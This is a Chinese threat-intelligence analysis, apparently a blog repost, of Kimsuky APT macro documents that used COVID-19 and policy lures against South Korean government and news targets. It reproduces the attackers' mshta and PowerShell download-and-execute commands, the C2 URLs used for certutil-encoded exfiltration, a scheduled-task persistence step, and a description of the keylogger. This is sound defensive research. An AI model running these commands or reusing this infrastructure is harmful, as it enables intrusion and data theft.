Gcow安全团队追影小组发布《Kimsuky APT组织利用疫情话题针对南韩进行双平台的攻击活动的分析报告》

一.前言

kimsuky APT组织(又名Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom) ,该组织一直针对于韩国的智囊团,政府组织,新闻组织,大学教授等等进行活动.并且该组织拥有windows 平台的攻击能力,载荷便捷,阶段繁多。并且该组织十分活跃.其载荷有带有漏洞的hwp文件,恶意宏文件,释放载荷的PE文件等。

近日,随着海外病例的增加,使用新型冠状病毒为题材的攻击活动愈来愈多.例如:海莲花APT组织通过白加  黑的手段向中国的政府部门进行鱼叉投递,摩诃草APT组织冒充我国的重点部门针对政府和医疗部门的攻  击活动,毒云藤和蓝宝菇组织通过钓鱼的方式窃取人员的邮箱密码,借以达到窃密或者是为下一阶段做准   备的目的以及蔓灵花组织继续采用SFX文档的方式对我国重点设施进行投放。

同时,在朝鲜半岛的争夺也随之展开. Gcow 安全团队追影小组在日常的文件监控之中发现名为kimsuky APT组织采用邮件鱼叉的方式针对韩国的新闻部门,政府部门等进行攻击活动,并且在此次活动之中体现出该组织在攻击过程中使用轻量化,多阶段脚本载荷的特点.并且在本次活动中我们看到了该组  织使用python 针对MacOS 平台进行无文件的攻击活动。

下面笔者将从攻击Windows 平台的样本以及攻击MacOs 平台的样本进行分析。

二.Windwos平台样本分析:

1.코로나바이러스 대응.doc(冠状病毒反应.doc)

0x00.样本信息:

1.jpg

该样本利用社会工程学的办法,诱使目标点击“启用内容”来执行宏的恶意代码。启用宏后显示的正文内容。通过谷歌翻译,提取到几个关键词:新型冠状病毒可以看出,这可能是针对韩国政府发起的一次攻击活动。

2.jpg

攻击者通过鱼叉邮件附件的方式将恶意载荷投递给受害目标

3.jpg

0x01. 样本分析

利用olevba 工具提取的宏代码如下: 其将执行的命令通过hex编码 的形式在宏里面自己解码后隐藏执行所执行的命令为:

mshta http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f

4.jpg

search.hta

其主要内嵌的是vbs 代码,请求URL 以获取下一段的vbs 代码,并且执行获取到的vbs 代码

URL地址:http://vnext.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1

5.jpg

1.vbs

下一段的vbs 代码就是其侦查者的主体代码:

1. 信息收集部分:

收集本机名以及本机所在域的名称,ip地址,用户名称, %programfiles%下的文件, %programfiles% (x86)下的文件,安装软件信息,开始栏的项目,最近打开的项目,进程列表,系统版本信息,set设置信息,远程   桌面连接信息, ,arp信息, %appdata%\Microsoft下所有文件以及子文件信息,文档文件夹信息,下载文件信息,powershell文件夹下的文件信息,盘符信息,宏的安全性信息,outlook信息等等

7.jpg
8.jpg

2. 添加计划任务以布置下一阶段的载荷:

伪装成Acrobat 更新的任务执行命令:

mshta http://vnext.mireene.com/theme/basic/skin/member/basic/upload/cfhkjkk.hta

获取当前时间,延迟后执行schtasks 创造该计划任务

9.jpg

cfhkjkk.hta

和search.hta 一样,也是一样的中转的代码,URL 为 : http://vnext.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=2

10.jpg

2.vbs

其同样也是vbs 文件.其主要的功能是查看%Appdata%\Windows\desktop.ini是否存在,如果存在则利用certutil -f -encode对文件进行编码并且输出为%Appdata%\Windows\res.ini,并且从URL地址下 载 http://vnext.mireene.com/theme/basic/skin/member/basic/upload/download.php? param=res1.txt 编码后的powershell 命令隐藏执行,执行成功后删除Appdata%\Windows\desktop.ini.并且从URL地址下载http://vnext.mireene.com/theme/basic/skin/member/basic/upload/download.php? 

11.jpg

res1.txt

该powershell 命令主要功能就是读取Appdata%\Windows\res.ini文件里的内容,再组成 HTTP 报文

后利用UploadString 上传到C2 , C2 地址为 : http://vnext.mireene.com/theme/basic/skin/member/basic/upload/wiujkjkjk.php

12.jpg

res2.txt

该powershell 命令主要功能是通过对比按键ASCII 码值记录信息

我们可以看到被黑的站点是一个购物平台,攻击者应该入侵这个购物平台后把相应的恶意载荷挂到该网站。

13.jpg
14.jpg

此外我们通过比较相同的宏代码发现了其一个类似的样本

2. 비건 미국무부 부장관 서신 20200302.doc(美国国务卿素食主义者20200302.doc)

0x00.样本信息

15.jpg

该样本利用社会工程学的办法,诱使目标点击“启用内容”来执行宏的恶意代码。启用宏后显示的正文内  容。通过谷歌翻译,提取到几个关键词:朝韩问题,政策,朝鲜半岛。  可以看出,这可能是针对韩国政府机构发起的一次攻击活动。

16.jpg

0x01 样本分析

其与上文所述相同不过,本样本执行的命令是:mshta http://nhpurumy.mireene.com/theme/basic/skin//member/basic/upload/search.hta/f

17.jpg

相同的中转search.hta

中转地址 为 : http://nhpurumy.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1

18.jpg

其执行的vbs代码与上文类似,在这里就不做赘述了.不过其计划任务所执行的第二部分hta的url地址为:http://nhpurumy.mireene.com/theme/basic/skin/member/basic/upload/cfhkjkk.hta

18.jpg

之后的部分代码与上文相同,不过其C2 的地址为nhpurumy.mireene.com 。在此就不赘述了。被入侵的网站可能是一个广告公司:

20.jpg
21.jpg

3. 붙임. 전문가 칼럼 원고 작성 양식.doc(附上.专家专栏手稿表格.doc)

0x01文档信息:

样本信息:

22.jpg

该样本利用社会工程学的办法,诱使目标点击“启用内容”来执行宏的恶意代码。启用宏后显示的正文内   容。通过谷歌翻译,提取到几个关键词:稿件、专家专栏。  可以看出,这可能是针对韩国新闻机构发起的一次攻击活动。

23.jpg

0x02 恶意宏分析

利用olevba 工具提取的宏代码如下:

24.jpg

显示文档的内容:

25.jpg

隐藏执行powershell.exe 代码读取%TEMP%\bobo.txt 的内容,并且使用iex 执行

26.jpg

Bobo.txt 内容

27.jpg

从http://mybobo.mygamesonline.org/flower01/flower01.ps1 上下载第二段powershell 载荷flower01.ps1 并且利用iex 内存执行

第二段powershell 载荷如图所示:

0 0 vote
Article Rating

未经允许不得转载:x-sec » Gcow安全团队追影小组发布《Kimsuky APT组织利用疫情话题针对南韩进行双平台的攻击活动的分析报告》

赞 (1) 打赏
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

0
Would love your thoughts, please comment.x
()
x